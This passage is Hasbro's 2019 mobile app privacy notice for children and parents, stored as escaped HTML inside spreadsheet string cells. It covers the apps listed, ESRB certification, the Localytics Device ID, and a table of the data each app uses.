leading-6"&gt;&lt;h1&gt;&lt;strong&gt;HASBRO MOBILE APPLICATION PRIVACY NOTICE&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;(&lt;strong&gt;Last Updated&lt;/strong&gt;: 20 December 2019)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Hasbro Cares About Your Privacy&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class=mt-8 dir=ltr&gt;&lt;p&gt;We're Hasbro, Inc., in the US. We make toys and games that you can find all over the world.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>Here, we tell you how we use info and keep it safe whenever you use one of our Apps that we mention below. Please make sure you read everything here carefully and ask a grown up to explain anything you don't understand.&lt;/p&gt;
&lt;p&gt;Parents and adults: the sections labeled “FOR GROWN-UPS” provide additional detail and information.&lt;/p&gt;
&lt;p&gt;&lt;span style="color:#36a2f6;"&gt;FOR GROWN-UPS:&lt;/span&gt; Hasbro, Inc. is an international toy company, headquartered in the United States but with affiliates globally, and Hasbro, Inc. is the controller of any personal information processed for the Mobile Apps.&lt;/p&gt;
 &lt;p&gt;Our EU Representative is Hasbro UK, Ltd.&lt;/p&gt;
&lt;p&gt;This Mobile Privacy Policy (“&lt;em&gt;&lt;strong&gt;MPP&lt;/strong&gt;&lt;/em&gt;”) explains how Hasbro, Inc. and its affiliated companies (collectively, “&lt;em&gt;&lt;strong&gt;Hasbro&lt;/strong&gt;&lt;/em&gt;”, “&lt;em&gt;&lt;strong&gt;we&lt;/strong&gt;&lt;/em&gt;”, “&lt;em&gt;&lt;strong&gt;our&lt;/strong&gt;&lt;/em&gt;”, or “&lt;em&gt;&lt;strong&gt;us&lt;/strong&gt;&lt;/em&gt;”) collect, use, and disclose information when the mobile applications listed below are used, or any other mobile applications where this MPP is posted or interact with us offline (for instance by contacting Customer Care) regarding the Apps (collectively, the “&lt;em&gt;&lt;strong&gt;Mobile Apps&lt;/strong&gt;&lt;/em&gt;” or “&lt;em&gt;&lt;strong&gt;Apps&lt;/strong&gt;&lt;/em&gt;”).&lt;/p&gt;
&lt;p&gt;If you are a California resident, please see the “&lt;a href="#Contact"&gt;Additional Disclosures for California Residents&lt;/a&gt;” section below.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Who is ESRB and what do they do for Hasbro?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;We've asked someone else called the ESRB to check how our Apps use info and keep it safe, and make sure that it's all OK.</t>
  </si>
  <si>
    <t>The ESRB will keep checking our Apps.&lt;/p&gt;
&lt;p&gt;&lt;span style="color:#36a2f6;"&gt;FOR GROWN-UPS:&lt;/span&gt; This MPP and the “ESRB privacy certified” certification seal shown in the MPP confirms that Hasbro is a valid licensee, and participating member, of the Entertainment Software Rating Board's Privacy Certified Program (“&lt;em&gt;&lt;strong&gt;ESRB&lt;/strong&gt;&lt;/em&gt;”). Please see &lt;span class=bumper&gt;&lt;a href="http://www.esrb.org/privacy/index.aspx"&gt;http://www.esrb.org/privacy/index.aspx&lt;/a&gt;&lt;/span&gt; for more information.</t>
  </si>
  <si>
    <t>To protect your privacy, we have voluntarily undertaken this privacy initiative and have had the Mobile Apps reviewed and certified by ESRB Privacy Certified to meet established online information collection and use practices. As a licensee of this privacy program, we are subject to frequent audits of our Mobile Apps and other enforcement and accountability mechanisms administered independently by the ESRB.&lt;/p&gt;
&lt;p&gt; We ask that you take the time to read this MPP carefully.&lt;/p&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt;&lt;a href="#Hasbro"&gt;Back to top&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;p style="text-align: center; width:100%; font-weight:700;"&gt;&lt;strong&gt;TABLE OF CONTENTS&lt;/strong&gt;&lt;/p&gt;&lt;/p&gt;
&lt;p&gt;&lt;ol&gt;&lt;li&gt;&lt;u&gt;&lt;a href="#A"&gt;The Apps&lt;/a&gt;&lt;/u&gt;&lt;/li&gt;&lt;li&gt;&lt;u&gt;&lt;a href="#Game_Info"&gt;Your Info&lt;/a&gt;&lt;/u&gt;&lt;/li&gt;&lt;li&gt;&lt;u&gt;&lt;a href="#Who_Can_See"&gt;Who Can See Info from the App?&lt;/a&gt;&lt;/u&gt;&lt;/li&gt;&lt;li&gt;&lt;u&gt;&lt;a href="#D"&gt;Where</t>
  </si>
  <si>
    <t>Is Info from the App Kept?&lt;/a&gt;&lt;/u&gt;&lt;/li&gt;&lt;li&gt;&lt;u&gt;&lt;a href="#Time"&gt;How Long is Info from the App Kept?&lt;/a&gt;&lt;/u&gt;&lt;/li&gt;&lt;li&gt;&lt;u&gt;&lt;a href="#F"&gt;Note to Parents&lt;/a&gt;&lt;/u&gt;&lt;/li&gt;&lt;li&gt;&lt;u&gt;&lt;a href="#G"&gt;You Have Rights About Your Info and can Complain&lt;/a&gt;&lt;/u&gt;&lt;/li&gt;&lt;li&gt;&lt;u&gt;&lt;a href="#H"&gt;Keeping Your Personal Info Safe&lt;/a&gt;&lt;/u&gt;&lt;/li&gt;&lt;li&gt;&lt;u&gt;&lt;a href="#Contact"&gt;Additional Disclosures for California Residents&lt;/a&gt;&lt;/u&gt;&lt;/li&gt;&lt;li&gt;&lt;u&gt;&lt;a href="#How_to"&gt;How to Ask Us Questions&lt;/a&gt;&lt;/u&gt;&lt;/li&gt;&lt;li&gt;&lt;u&gt;&lt;a href="#K"&gt;When Can this Change and How?&lt;/a&gt;&lt;/u&gt;&lt;/li&gt;&lt;/ol&gt;&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="#Hasbro"&gt;Back to top&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;p style="text-align: center; width:100%;   "&gt;&lt;strong id=A&gt;1.</t>
  </si>
  <si>
    <t>The Apps&lt;/strong&gt;&lt;/p&gt;&lt;/p&gt;
&lt;p&gt;What we say on this page is only about the Apps named below. And any other Apps of ours where you see all this.&lt;/p&gt;
&lt;p&gt;&lt;span style="color:#36a2f6;"&gt;FOR GROWN-UPS:&lt;/span&gt; This MPP is effective as of the Last Updated date posted above and applies only to information collected by Hasbro from users of the following Mobile Apps and any other mobile app published by Hasbro which links to the MPP.&lt;/p&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt;Beyblade Burst&lt;br&gt;
Dance Code&lt;br&gt;
Equestria Girls&lt;br&gt;
Force Link&lt;br&gt;
Furby Connect World&lt;br&gt;
FurReal Makers: Proto Max&lt;br&gt;
FurReal Friends: Get Up &amp;amp; Go Go&lt;br&gt;
Hanazuki: Full of Treasures&lt;br&gt;
HeroVision:</t>
  </si>
  <si>
    <t>Iron Man&lt;br&gt;
Littlest Pet Shop Your World&lt;br&gt;
Love2Learn Elmo&lt;br&gt;
 My Little Pony: Friendship Celebration&lt;br&gt;
NERF Energy Rush&lt;br&gt;
NERF LaserOps Pro&lt;br&gt;
Play-Doh Touch&lt;br&gt;
Smart R2-D2&lt;br&gt;
Star Wars Lightsaber Academy&lt;br&gt;
Star Wars Studio FX&lt;br&gt;
Star Wars Ultimate D-O&lt;br&gt;
Transformers Bee Vision&lt;br&gt;
Transformers: Robots in Disguise&lt;br&gt;
Transformers TCG Companion App&lt;/p&gt;
&lt;p&gt;If your App is not named above, we'll tell you about it somewhere else, or it might be someone else's app, not ours, so you should check out what they say about their app and how they use your info.&lt;/p&gt;
&lt;p&gt;&lt;span style="color:#36a2f6;"&gt;FOR GROWN-UPS: &lt;/span&gt; This MPP does not apply to any other information collected by Hasbro through any other means.</t>
  </si>
  <si>
    <t>For clarity, this MPP does not apply to any of Hasbro’s websites; Hasbro’s other mobile apps that do not link here; Hasbro’s other online services (e.g., social media channels); or any apps, websites, or online services maintained by other companies or organizations to which we may link.&lt;/p&gt;
&lt;p&gt;Your use of any mobile app, website, or online service created or maintained by another company is subject to such other company’s applicable privacy policies and terms of use, and we encourage you to read the third-parties’ privacy policies and terms of use before submitting personal or other information or using that mobile app, website, or online service.&lt;/p&gt;
&lt;p&gt; &lt;a href="#Hasbro"&gt;Back to top&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;p style="text-align: center; width:100%;"&gt;&lt;strong id=Game_Info&gt;2. Your Info&lt;/strong&gt;&lt;/p&gt;&lt;/p&gt;
&lt;p&gt; We get some info about the smart device you use to play our Apps (we call this Device Info – more on this below) and how you like to play with the App (we call this Game Info).</t>
  </si>
  <si>
    <t>We get this in a way that means we can't tell who you are in real life. This is because we try hard not to get any personal info about you (like your name or your address), and we try to use your personal info in a way that keeps your info safe.&lt;/p&gt;
&lt;p&gt;What we do like to know is how our App is being used, like how long a game is being played for, what country you are playing in and what kind of smart device (maybe your mom's or dad's mobile phone or iPad) you are playing on.&lt;/p&gt;
&lt;p&gt;&lt;span style="color:#2b5aaf;"&gt;Device Info&lt;/span&gt;&lt;/p&gt;
&lt;p&gt; We get some info from the smart device you use our App on (maybe your mom's or dad's mobile phone or iPad) to avoid repeat information and make it easy to play with our Apps, but we try to do this in a way that keeps this info safe.</t>
  </si>
  <si>
    <t>We call this “&lt;em&gt;&lt;strong&gt;Device Info.&lt;/strong&gt;&lt;/em&gt;”&lt;/p&gt;
&lt;p&gt;&lt;span style="color:#36a2f6;"&gt;FOR GROWN-UPS:&lt;/span&gt; When an App is used for the first time, we create a special identifier (a random alphanumeric code “scrambled ID”, which we term a "Localytics Device ID") which will relate to that App.</t>
  </si>
  <si>
    <t>To do this, we generate the Localytics Device ID from some other random identifiers that are on your mobile device, specifically a temporary random alphanumeric code called an "install ID" and a so-called advertising ID. These elements (which we use to create the new special identifier, the Localytics Device ID) come from your particular mobile device and operating system, but the elements themselves are not collected or transmitted to us or anyone else — only the newly-created Localytics Device ID is collected and used in connection with Device Info and Game Info.&lt;/p&gt;
&lt;p&gt; In addition, due to the way in which the Localytics Device ID is generated, it is not possible to work out (i.e. "reverse engineer") your original device advertising ID from your Localytics Device ID.</t>
  </si>
  <si>
    <t>This means that once the Localytics Device ID has been generated, we are no longer able to identify a specific individual in the real world from that identifier. Neither Hasbro nor the user can access the Localytics Device ID on their device. The creation of the Localytics Device ID only occurs the first time the App is opened and is capable of connecting to the Internet and not again unless the App is uninstalled and subsequently reinstalled.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>The Localytics Device ID is unique to your particular advertising ID. If you delete our Apps from your device and then install or reinstall one of our Apps again for the same device, the Localytics Device ID will be likely be the same, unless you have also changed your advertising ID in your device settings. If you get the same App for different devices, the Localytics Device ID on each device will be different, even if the same person uses the same App on different devices.</t>
  </si>
  <si>
    <t>The Localytics Device ID in one App does not share with, or “know” about, a Localytics Device ID on another device or platform. However, if you download multiple Apps on one device (i.e. you already have one App on that device and you download a different App on the same device), they may share the same Localytics Device ID.&lt;/p&gt;
&lt;p&gt; We do not generally use analytics to compare Localytics Device IDs between Apps; however we do use it to: (i) distinguish one user from another (for counting purposes); (ii) to understand what parts of our Apps are being used; and (iii) to ensure that our Apps are appropriately secure and protected.</t>
  </si>
  <si>
    <t>We do not use Localytics Device IDs in order to treat users any differently, to segment our audiences, to target advertisements or push notifications, and we do not routinely collect anything that could be used in connection with the Localytics Device ID in order to identify the user in the real world.&lt;/p&gt;
&lt;p&gt; &lt;a href="#Hasbro"&gt;Back to top&lt;/a&gt;&lt;/p&gt;
&lt;p&gt; Our App uses Device Info (like guessing its country and city) to make sure you get the right App in the right language, and to help you use the App and tell you things you might want to know about your App or toy and to help us fix problems with the App like bugs, should they arise.&lt;/p&gt;
&lt;p&gt;&lt;span style="color:#36a2f6;"&gt;FOR GROWN-UPS:&lt;/span&gt; Hasbro will collect the device type, the device's operating system (like iOS or Android) and language setting, the network carrier that your device uses (e.g., Vodafone, EE, Orange), the Localytics Device ID (so long as the device connects to the Internet) and will guess the country and city (from the network info used by the device).. Hasbro uses this information to work out which version of the App to install on the device, and in which language (e.g., if the device language is set to French, then the French version would be delivered), to provide the user with a suitable App, for performance of our contract or for our legitimate business interests in delivering and maintaining our Apps.&lt;/p&gt;
&lt;p&gt;&lt;a href="#Hasbro"&gt;Back to top&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="color:#2b5aaf; "&gt;Game Info&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We use some info sent from the App to help us figure out how kids or grownups use our App, so we can make it better, easier and more fun to use, and to connect your play experience with other players. We call this info “&lt;em&gt;&lt;strong&gt;Game Info.&lt;/strong&gt;&lt;/em&gt;” Game Info may include things you can see and choose in the App, like a Blader ID or a Blaster ID. It also includes various play events and milestones you may come across while playing, to keep track of your progress.</t>
  </si>
  <si>
    <t>We get Game Info whenever you use your App if you have the Internet on. We try hard not to get any personal info about you, like your address. We only want to know how our App is being used, like how long a game is being played for.</t>
  </si>
  <si>
    <t>We often combine Game Info with Device Info to help us find this stuff out – but don't worry, we still won't know who you are in the real world if we do this.&lt;/p&gt;
&lt;p&gt;&lt;span style="color:#36a2f6;"&gt;FOR GROWN-UPS:&lt;/span&gt; The Localytics Device ID is used to assist us in gathering non-personal analytics and statistical information regarding the use of our Apps and game play data (both Game Info and Device Info), e.g., session length (how long the App was played for), what game levels were reached in the App, whether the app connected to a Hasbro toy, etc. It may also be used to deliver &lt;a href="#In-app_Messaging"&gt;in-App messages&lt;/a&gt; about gameplay (see below).&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We use this Game Info, which does not identify individual users, in our own legitimate business interests, to analyze trends, to administer our Apps, debug them in case of problems and to gather demographic information about our user base as a whole (e.g., number of users in a particular country or region), so that we can improve our Apps and toys.&lt;/p&gt;
&lt;p&gt;Although Game Info is associated with Device Info, including the Localytics Device ID, we do not link this data to users’ personal information. Even knowing a Localytics Device ID, device type, operating system, device language, gameplay statistics, network carrier and estimated city and country together would not be enough to identify the individual who used the App. Nevertheless, Hasbro limits which employees are permitted to see the Localytics Device ID associated with particular data.</t>
  </si>
  <si>
    <t>Our service providers (&lt;a href="#Who_Can_See"&gt;see below&lt;/a&gt;) can only view aggregated data.&lt;/p&gt;
&lt;p&gt;Country and language info is used by some Apps to check if Hasbro shows ads in that country (see below) and if so, show contextual ads in the correct language, or suppress them altogether.&lt;/p&gt;
&lt;p&gt;&lt;a href="#Hasbro"&gt;Back to top&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="color:#2b5aaf;"&gt;Do we need to use this Info?&lt;/span&gt;&lt;/p&gt;
&lt;p&gt; We only collect and use the info that we've told you about in this MPP and only for the reasons we have told you in this MPP. We only collect the info that we need.</t>
  </si>
  <si>
    <t>Sometimes, if you still don't want us to use this info, you may need to stop using or uninstall the App.&lt;/p&gt;
&lt;p&gt;&lt;span style="color:#36a2f6;"&gt;FOR GROWN-UPS:&lt;/span&gt; In this MPP we describe the types of personal info we collect and why we need it. In some circumstances, you may still decide that you do not want us to collect and use this info in the way that we have described.</t>
  </si>
  <si>
    <t>If we can provide you with the App functionality without this info, we will let you know and give you the option to choose not to provide us with this information. However, sometimes we cannot provide the App without this personal info and if you decide that you still don't want us to collect and use it, you will have to uninstall and not use the App.&lt;/p&gt;
&lt;p&gt; &lt;a href="#Hasbro"&gt;Back to top&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="color:#2b5aaf;"&gt;Find What Your App Does&lt;/span&gt;&lt;/p&gt;
 &lt;p&gt;</t>
  </si>
  <si>
    <t>In the line for your App in the chart below, a  (check mark) means we use that type of info. Like, for Beyblade Burst we use the "Multiplayer ID", we know if a Hasbro Ad has been clicked in your App, and so on – all this is explained more just below the chart. We always use Game Info and Device Info for every App on the list.&lt;br&gt;
&lt;div style="overflow-x:auto;" class=tableOverflow&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th class="table-header coloring space" rowspan=3 scope=col&gt;&lt;strong&gt;Mobile App&lt;/strong&gt;&lt;/th&gt;&lt;th class=space colspan=11 scope=col style="text-align: center; width:100%;background: #e7e6e6;"&gt;&lt;strong&gt;Information Used&lt;/strong&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=table-header rowspan=2 scope=col&gt;&lt;strong&gt;Multiplayer ID&lt;/strong&gt;&lt;/td&gt;&lt;td class=table-header rowspan=2 scope=col&gt;&lt;strong&gt;Hasbro Ad Clicked&lt;/strong&gt;&lt;/td&gt;&lt;td class=table-header rowspan=2 scope=col&gt;&lt;strong&gt;In-app Purchase Made&lt;/strong&gt;&lt;/td&gt;&lt;td class=table-header rowspan=2 scope=col&gt;&lt;strong&gt;Toy Scanning Activity&lt;/strong&gt;&lt;/td&gt;&lt;td class=table-header rowspan=2 scope=col&gt;&lt;strong&gt;Toy Connection Activity&lt;/strong&gt;&lt;/td&gt;&lt;td class=table-header rowspan=2 scope=col&gt;&lt;strong&gt;In-app Messaging&lt;/strong&gt;&lt;/td&gt;&lt;td class=table-header colspan=5 scope=col&gt;&lt;strong&gt;Other Stuff&lt;/strong&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=table-header scope=col&gt;&lt;strong&gt;Restore&lt;/strong&gt;&lt;/td&gt;&lt;td class=table-header scope=col&gt;&lt;strong&gt;GPS&lt;/strong&gt;&lt;/td&gt;&lt;td class=table-header scope=col&gt;&lt;strong&gt;Camera&lt;/strong&gt;&lt;/td&gt;&lt;td</t>
  </si>
  <si>
    <t>class=table-header scope=col&gt;&lt;strong&gt;BTLE&lt;/strong&gt;&lt;/td&gt;&lt;td class=table-header scope=col&gt;&lt;strong&gt;Media&lt;/strong&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt;Beyblade Burst&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-App Purchase Made"&gt;&lt;/td&gt;&lt;td data-th="Toy Scanning Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt;Dance Code&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;/td&gt;&lt;td data-th="Toy Scanning Activity"&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt;Equestria Girls&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="Toy Scanning Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt;Force Link&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;/td&gt;&lt;td</t>
  </si>
  <si>
    <t>data-th="Toy Scanning Activity"&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt;Furby Connect&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="Toy Scanning Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt;FurReal Friends: Get Up &amp;amp; Go Go&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;/td&gt;&lt;td data-th="Toy Scanning Activity"&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt;FurReal Makers: Proto Max&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;/td&gt;&lt;td data-th="Toy Scanning Activity"&gt;&lt;span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt;Hanazuki&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;/td&gt;&lt;td data-th="Toy</t>
  </si>
  <si>
    <t>Scanning Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt;HeroVision: Iron Man&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;/td&gt;&lt;td data-th="Toy Scanning Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt;Littlest Pet Shop: Your World&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="Toy Scanning Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt;Love2Learn</t>
  </si>
  <si>
    <t>Elmo&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;/td&gt;&lt;td data-th="Toy Scanning Activity"&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt; My Little Pony: Friendship Celebration&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;/td&gt;&lt;td data-th="Toy Scanning Activity"&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;td data-th="Toy Connection Activity"&gt;&lt;/td&gt;&lt;td data-th="In-app Messaging"&gt;&lt;/td&gt;&lt;td data-th=Restore&gt;&lt;/td&gt;&lt;td data-th=GPS&gt;&lt;/td&gt;&lt;td data-th=Camera&gt;&lt;/td&gt;&lt;td data-th=BTLE&gt;&lt;/td&gt;&lt;td data-th=Media&gt;&lt;div class=spacing&gt;✓&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=brand-col data-th="Mobile App"&gt;&lt;span&gt;NERF Energy Rush&lt;/span&gt;&lt;/td&gt;&lt;td data-th="Multiplayer ID"&gt;&lt;/td&gt;&lt;td data-th="Hasbro Ad Clicked"&gt;&lt;/td&gt;&lt;td data-th="In-app Purchase Made"&gt;&lt;/td&gt;&lt;td data-th="Toy</t>
  </si>
  <si>
